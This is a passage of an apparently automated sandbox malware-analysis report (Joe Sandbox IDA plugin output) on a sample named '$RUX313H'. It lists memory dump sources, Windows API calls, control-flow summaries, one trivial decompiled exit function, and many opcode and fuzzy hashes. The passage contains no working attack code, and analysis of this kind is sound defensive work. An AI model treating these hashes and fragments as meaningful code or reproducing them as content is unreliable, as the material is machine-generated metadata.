                                                                            • Part of subcall function 00DF1B5F: EncodePointer.KERNEL32(00000000,?,00DF1A13,000000FF,?,00DF2CB0,00000011,00000000,?,00DF18B3,0000000D), ref: 00DF1BD6
                                                                            • Part of subcall function 00DF1B5F: DecodePointer.KERNEL32(-00000004,?,00DF1A13,000000FF,?,00DF2CB0,00000011,00000000,?,00DF18B3,0000000D), ref: 00DF1BE6
                                                                            • Part of subcall function 00DF1B5F: EncodePointer.KERNEL32(00000000,?,00DF1A13,000000FF,?,00DF2CB0,00000011,00000000,?,00DF18B3,0000000D), ref: 00DF1BEC
                                                                            • Part of subcall function 00DF1B5F: DecodePointer.KERNEL32(?,00DF1A13,000000FF,?,00DF2CB0,00000011,00000000,?,00DF18B3,0000000D), ref: 00DF1C02
                                                                            • Part of subcall function 00DF1B5F: DecodePointer.KERNEL32(?,00DF1A13,000000FF,?,00DF2CB0,00000011,00000000,?,00DF18B3,0000000D), ref: 00DF1C0D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
• Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp
• Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp
• Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                          • String ID:
                                                                          • API String ID: 2158581194-0
                                                                          • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                          • Instruction ID: 7684081a6e1fdb333da0382bd4408d1a56255990ff57e89f719006e3bc45f232
                                                                          • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                          • Instruction Fuzzy Hash: 9AB0123158030CB3DA102641FC03F157B0D8751B51F114020FB0C2D1E2B993756040E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

Control-flow Graph

• df19e2-df19e8: call df19b0
• df19ed-df19f1: ExitProcess (reached from df19e2-df19e8)
                                                                          C-Code - Quality: 100%
                                                                          			E00DF19E2(int _a4) {
                                                                          				void* _t4;
                                                                          
                                                                          				E00DF19B0(_t4, _a4); // executed
                                                                          				ExitProcess(_a4);
			}


                                                                          APIs
                                                                            • Part of subcall function 00DF19B0: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000001,?,?,00DF19ED,00000000,?,00DF4933,000000FF,0000001E,00000000,00000000,00000000,?,00DF2E9E), ref: 00DF19BF
                                                                            • Part of subcall function 00DF19B0: GetProcAddress.KERNEL32(00000001,CorExitProcess), ref: 00DF19D1
                                                                            • Part of subcall function 00DF19B0: CorExitProcess.MSCOREE(00000000,?,?,00DF19ED,00000000,?,00DF4933,000000FF,0000001E,00000000,00000000,00000000,?,00DF2E9E,00000000,00000000), ref: 00DF19DE
                                                                          • ExitProcess.KERNEL32 ref: 00DF19F1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
• Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp
• Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp
• Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: ExitProcess$AddressHandleModuleProc
                                                                          • String ID:
                                                                          • API String ID: 1002262038-0
                                                                          • Opcode ID: 0d3552001684e91b9bc7e2fae03893b4cb426dfb667951ec5c9594961789cdaa
                                                                          • Instruction ID: f7180767bf67fa60e56c70b71cf684ca20ece86fcb7c3693ea3e4ba6fe775133
                                                                          • Opcode Fuzzy Hash: 0d3552001684e91b9bc7e2fae03893b4cb426dfb667951ec5c9594961789cdaa
                                                                          • Instruction Fuzzy Hash: D1B0923000020CBBCB012F11DC1A8687F29EB00390B008020FA0848231DFB2AA919AE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph: basic blocks 3421ed8 through 34221d6, with calls to 3421ed8 and 3421ec9 (full edge list omitted).
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `l
                                                                          • API String ID: 0-379310572
                                                                          • Opcode ID: e7bd40cef43e8c87e8dd563db82c01cbc45d6cf11c3a27f8713175601964be96
                                                                          • Instruction ID: 9f550ff4d68d859592135f5f328615faed7dad878bf916e61b28962d3fe32ff2
                                                                          • Opcode Fuzzy Hash: e7bd40cef43e8c87e8dd563db82c01cbc45d6cf11c3a27f8713175601964be96
                                                                          • Instruction Fuzzy Hash: 4C81E130B102249FCB24DF64E858BAEBBB6BF84300F54C52AD516AF395CBB09C45CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph: basic blocks 5ca5a38 through 5ca5c7c, with calls to 5ca5c80 and 5ca5c90 (full edge list omitted).
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \l
                                                                          • API String ID: 0-3304691678
                                                                          • Opcode ID: d5f51389cfdaef607a588705dddd48507201754442e78a3935a2312aafe64a6e
                                                                          • Instruction ID: b6f498eacc07d2e9eaf33430116f8f0015da2c214961218fb415c572b51cd397
                                                                          • Opcode Fuzzy Hash: d5f51389cfdaef607a588705dddd48507201754442e78a3935a2312aafe64a6e
                                                                          • Instruction Fuzzy Hash: 4C51AD707006009FDB54DB79C495BAEBBE2EF89218F558569E50AEB7A0DB30ED018B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph: basic blocks 342cea0 through 342d14b, with calls to 342c720, 342c7b0, 342d6c8 and 342d6d8 (full edge list omitted).
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: {
                                                                          • API String ID: 0-3358580159
                                                                          • Opcode ID: 901afc4d40285e1f3d3cc1c9a76d84be59b2b2be4f4d0abbe67543c41ef7e3d4
                                                                          • Instruction ID: e39d92c0d31c408af15d880e85405880536ba95bc8930cf8b7a336e47f3b483f
                                                                          • Opcode Fuzzy Hash: 901afc4d40285e1f3d3cc1c9a76d84be59b2b2be4f4d0abbe67543c41ef7e3d4
                                                                          • Instruction Fuzzy Hash: AA719C30A006559FCB14DFA8C480A9EBBF2BF89304F65892AE515EF355DB70AC46CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph: basic blocks 342ce91 through 342d14b, with calls to 342c720, 342c7b0, 342d6c8 and 342d6d8 (full edge list omitted).
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: {
                                                                          • API String ID: 0-3358580159
                                                                          • Opcode ID: 67637b38114a9c2f7b83c201dc53325b829c8fdfd76b2af075119a6309cc75a7
                                                                          • Instruction ID: 941670d23333c25f3d324a8fc957c6e62958538c9a9ab0db057596bcbfd41663
                                                                          • Opcode Fuzzy Hash: 67637b38114a9c2f7b83c201dc53325b829c8fdfd76b2af075119a6309cc75a7
                                                                          • Instruction Fuzzy Hash: B2513C74E006199FCB14CFA4C480A9EFBF2BF88304F59856AE915AF354DB71AD46CB84
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph: basic blocks 342c1cf through 342c775, with calls to 3429fb0, 342bca0, 342c720, 342c711, 342c1e8, 342c1cf, 342cea0, 342ce91 and 342f1a0 (full edge list omitted).
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: c"
                                                                          • API String ID: 0-2139221276
                                                                          • Opcode ID: de4282f6f66ece5229ddb21abcfef506ca4a1f94b65eaac490dfac939a866b79
                                                                          • Instruction ID: 2604cbb1a66894d2f8ca45fb76750fe473a8e5d8cb017de42aa7335da9fdecd4
                                                                          • Opcode Fuzzy Hash: de4282f6f66ece5229ddb21abcfef506ca4a1f94b65eaac490dfac939a866b79
                                                                          • Instruction Fuzzy Hash: 8F315075B002158FCB05DFA9D49466FBBF6EF88214714856AE405EB314EF34DD06CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `l
                                                                          • API String ID: 0-379310572
                                                                          • Opcode ID: 1d6bba0b18f7173319d711b9005384917ad1647b08a37519e3176dc8585ae6bc
                                                                          • Instruction ID: 7844bad45b833a090616182e7b358dfafab5db0a163d93c188c27abbdc60c688
                                                                          • Opcode Fuzzy Hash: 1d6bba0b18f7173319d711b9005384917ad1647b08a37519e3176dc8585ae6bc
                                                                          • Instruction Fuzzy Hash: 3E01D4367009255BC214ABB8E04526FB797EBC5564B958D2ED10FCB784DF60EC058392
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1676ff7b327c41f9dcd1e0eb8e9a966ce5496e993eeed65a0cd7c78bcf37921b
                                                                          • Instruction ID: 2f5986040044a46ccbb29ac893fa9cb21d058479f3958baeebf01bd1baca6d54
                                                                          • Opcode Fuzzy Hash: 1676ff7b327c41f9dcd1e0eb8e9a966ce5496e993eeed65a0cd7c78bcf37921b
                                                                          • Instruction Fuzzy Hash: 0D228F75B002158FCB10DFA8D484A6EFBF2FF88214B56846AD906EB355DB34ED42CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 39c5a915a2f770fdf2a46e1b4395f1a1cac320c09f381dfebe4140c90356a272
                                                                          • Instruction ID: 7600aae735690fed31ae608905ce8e5916364239a8d6cbaaa1a0493fadecb0ea
                                                                          • Opcode Fuzzy Hash: 39c5a915a2f770fdf2a46e1b4395f1a1cac320c09f381dfebe4140c90356a272
                                                                          • Instruction Fuzzy Hash: 76124835B002459FCB04DF98C894EAEBBB2FF88314F56C959E505AB2A5DB30EC41CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 384f60ad8e96f0be6068a4026205b8ad3ce3d67e89e6057b94cba1af37b3b69b
                                                                          • Instruction ID: d3ff39dd9740b45ef0df7d86d1733c26f843dd836f0305aa2bc5f2f01af524c2
                                                                          • Opcode Fuzzy Hash: 384f60ad8e96f0be6068a4026205b8ad3ce3d67e89e6057b94cba1af37b3b69b
                                                                          • Instruction Fuzzy Hash: 3212AC34A00624CFDB14DF64C894B99BBB2FF89310F2585A9E90AAB350DF35AD85CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8845475a2926d009b74ce8a7b33dd272e9316c2a708ec9c890d5004eb50df355
                                                                          • Instruction ID: b036a5e7491e35582ff459c87c78fd00ea16ac1cc6a0a4d2ee7f71980250ecec
                                                                          • Opcode Fuzzy Hash: 8845475a2926d009b74ce8a7b33dd272e9316c2a708ec9c890d5004eb50df355
                                                                          • Instruction Fuzzy Hash: 28029B34A00625DFDB14DF64C894B99B7B2FF89310F2185A9E90AAB360DF31AD85CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f5c7b40c540e3dc02606a053e7113a10ae7ed3b756eb70f2cebdee5ccfe8aea2
                                                                          • Instruction ID: 389524a77abaa41165342ab54e4444dbfe03e252646ba4f3233b3016027f8c78
                                                                          • Opcode Fuzzy Hash: f5c7b40c540e3dc02606a053e7113a10ae7ed3b756eb70f2cebdee5ccfe8aea2
                                                                          • Instruction Fuzzy Hash: 82D18E74B042149FCB08EF69D898A6DBBB2FF89214F54C12AE516EF395DB309C41CB85
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4e8e7b5b2806e167abcd477db94e1c94e85661638a85dd645ada1559b7c3e351
                                                                          • Instruction ID: 5a5fec846a14d46420e39ad7e2b2a48e9fca1c43557c7c26d482b0ecfeb5e810
                                                                          • Opcode Fuzzy Hash: 4e8e7b5b2806e167abcd477db94e1c94e85661638a85dd645ada1559b7c3e351
                                                                          • Instruction Fuzzy Hash: FCE16E75A00626CFCB14DF58C4849AEBBF2FF88704B568959D84AAB365DB30FD41CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: adc984d4e43637124c122f2b03f3506a759cddefd623d1060f3ff85b947821f8
                                                                          • Instruction ID: 186cd52af2dd49d89537a4a9540734133cb01f4c99a2d2b2b5c9693ac2c22e82
                                                                          • Opcode Fuzzy Hash: adc984d4e43637124c122f2b03f3506a759cddefd623d1060f3ff85b947821f8
                                                                          • Instruction Fuzzy Hash: 96D119756002168FCB04DF58C584DBEBBF6FF84308B968999E4069B2A5DB30FD46CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 114c9e7561af354a72e98634debb2002bcc47ec8133ffff31b8ce464c52aeca2
                                                                          • Instruction ID: 1c6162185559bd32a047f576450a8613ed17603f0ba61e93d3c579f3179556fd
                                                                          • Opcode Fuzzy Hash: 114c9e7561af354a72e98634debb2002bcc47ec8133ffff31b8ce464c52aeca2
                                                                          • Instruction Fuzzy Hash: 17B1A174B042108FCB14DB69D894A6EBBF2BFC8210F98C52AE506EF355DB719C46CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7e36032b0ef39b247a323565c9c7bad4bffa60971d7e3b4ec272cfd81a4873aa
                                                                          • Instruction ID: c543238a73b9c63de05d1d2bab74181ca420ff34cea3ae172064325bd6a107e5
                                                                          • Opcode Fuzzy Hash: 7e36032b0ef39b247a323565c9c7bad4bffa60971d7e3b4ec272cfd81a4873aa
                                                                          • Instruction Fuzzy Hash: 1FC12834A006148FCB54DF69C884A9DBBF2FF89304F6581A9E50AEB761DB71AD45CF80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7f5df697eb3c25d58ea100373a83655905476fc37461d07af6903e096046a51a
                                                                          • Instruction ID: 353e672d249f3dfcc1bd872f484ef524b0b684bf2f3d8e98415346c695fe71c4
                                                                          • Opcode Fuzzy Hash: 7f5df697eb3c25d58ea100373a83655905476fc37461d07af6903e096046a51a
                                                                          • Instruction Fuzzy Hash: 81C12834A006148FCB54DF69C884A9DBBF2FF89704F6581A9E50AEB361DB71AD45CF80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 546fe7c15964bb34cb42fa146aef6fa49890e9a267c09deeb6ce4ae5c6dec21a
                                                                          • Instruction ID: a3fb0938ae893e181e75bb7ad162f8c09f7770e845406182468e2bf17373664c
                                                                          • Opcode Fuzzy Hash: 546fe7c15964bb34cb42fa146aef6fa49890e9a267c09deeb6ce4ae5c6dec21a
                                                                          • Instruction Fuzzy Hash: 49B1D274A002149FCB14DF59C884EAABBF6EF88310F55C45AE915AF3A1DB34EC81CB64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 55f0202929ef3dff0dc0c589e7cf00f152a5cdb659ae7357d587026013709b1e
                                                                          • Instruction ID: ce1fbd8003c7800cb7d7dec64652581b9f86c550d3a1f6b7c75d3a0618646bf6
                                                                          • Opcode Fuzzy Hash: 55f0202929ef3dff0dc0c589e7cf00f152a5cdb659ae7357d587026013709b1e
                                                                          • Instruction Fuzzy Hash: D9A19A71A006149FC724CF68C880A6AFBF6FF88314F588A5AE51A9B751C731FC46CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7776ea3a88cf2b65cadde2f5ddea2f3b04606e16890cff44eed713c45f5fe592
                                                                          • Instruction ID: c90a72d666b1b0a58d17f14d3321eb313b0481d5d3ee9b6d90ac54a8058ad3db
                                                                          • Opcode Fuzzy Hash: 7776ea3a88cf2b65cadde2f5ddea2f3b04606e16890cff44eed713c45f5fe592
                                                                          • Instruction Fuzzy Hash: A881AF35B042448FCB18EB79D4A8AADBBF2FF88215B14C869D406EB365DF349D45CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e187165dc8783274e5cabe11da799f18c89c98b91489a424e02b51004bc6b74c
                                                                          • Instruction ID: 061a0b2f7be646afd4e95e0da1ab25ce205f2df3112275be779d195eed1ba73c
                                                                          • Opcode Fuzzy Hash: e187165dc8783274e5cabe11da799f18c89c98b91489a424e02b51004bc6b74c
                                                                          • Instruction Fuzzy Hash: FA71A1756002258FC714CF98C884A6EBBF5FF88314B5585AAE819EF761DB30EC01CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fb5ee5536dfdb4b97f31945d685a7552fd57ee24a8f3e46d9833edb9065a10bf
                                                                          • Instruction ID: d15f9baff7a4d8c60b7743fbdef8541ae8df69c698a5e2bfa44d5ce49fb7acf9
                                                                          • Opcode Fuzzy Hash: fb5ee5536dfdb4b97f31945d685a7552fd57ee24a8f3e46d9833edb9065a10bf
                                                                          • Instruction Fuzzy Hash: 2391A435A046158FCB01DF64C8849E9FBF2FF89318B25C5AAD445AB366DB31EC46CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 19d12ef13949bf3d9bf993c7839184f88b9520b54165785390a9e271dce1b7ac
                                                                          • Instruction ID: c820e6fd8c8f680721cd822b89e8d5c807c1411b9dfdd7191b7a9462b65ef00c
                                                                          • Opcode Fuzzy Hash: 19d12ef13949bf3d9bf993c7839184f88b9520b54165785390a9e271dce1b7ac
                                                                          • Instruction Fuzzy Hash: 73A10874A10619CFCB48DFA9D49489DB7B2FF88314721C699E905AB329EB70ED49CF40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a81e1aa8b05a52a791b011501f2480090ceb71f9ae2128ed3769b6ce2db3fce9
                                                                          • Instruction ID: 2d9a8f62088691b4434ea23a138c243a5bacc22778adfedd194d72aba52b97f5
                                                                          • Opcode Fuzzy Hash: a81e1aa8b05a52a791b011501f2480090ceb71f9ae2128ed3769b6ce2db3fce9
                                                                          • Instruction Fuzzy Hash: E4817074A002158FCB44DF69C880AADFBB6EF84314F55859AE505AF3A1DB30ED82CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3ef42a35db277b57a82a6d8f2809ce58d08624e0e9f48e7b6996720cc99fe1c4
                                                                          • Instruction ID: 02a569f0b322532f80aa77c7ace7fd870ab3a2d8c47eccf7fb70c6e201c6e530
                                                                          • Opcode Fuzzy Hash: 3ef42a35db277b57a82a6d8f2809ce58d08624e0e9f48e7b6996720cc99fe1c4
                                                                          • Instruction Fuzzy Hash: 25911874A10619CFCB48DFA9D49489DB7B2FF88314721C699E905AB329EB70ED49CF40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5f53079eb5df8b60f88a50123f1d9072847c15ceaa26f46e09d602af42ebb10a
                                                                          • Instruction ID: 06a15f5973b1487e3512fed0e25fd6cb66f731b484602b50a370ba343f435eb0
                                                                          • Opcode Fuzzy Hash: 5f53079eb5df8b60f88a50123f1d9072847c15ceaa26f46e09d602af42ebb10a
                                                                          • Instruction Fuzzy Hash: 1071F130A046249FCB04DF79D884A9EBBF2FF84208F558569E509EB395DF319D028BD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1ba2ae75fe522daf8bab1f607fd334a7bb46823777322c275f70d248f1efa88f
                                                                          • Instruction ID: 89b7fc58b6fb669e881e4afd2987152bb3c4ceef77e29e13d8c0fd1e2b551c3c
                                                                          • Opcode Fuzzy Hash: 1ba2ae75fe522daf8bab1f607fd334a7bb46823777322c275f70d248f1efa88f
                                                                          • Instruction Fuzzy Hash: 2F51E1357006109FD710CB65C840B6FBBEAEF85714F5580AAEA05AF394EB34EC0287A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4080d5343089338b1bf2b8332c2c936d64ed11d31cbe6def0488503e0050ae6a
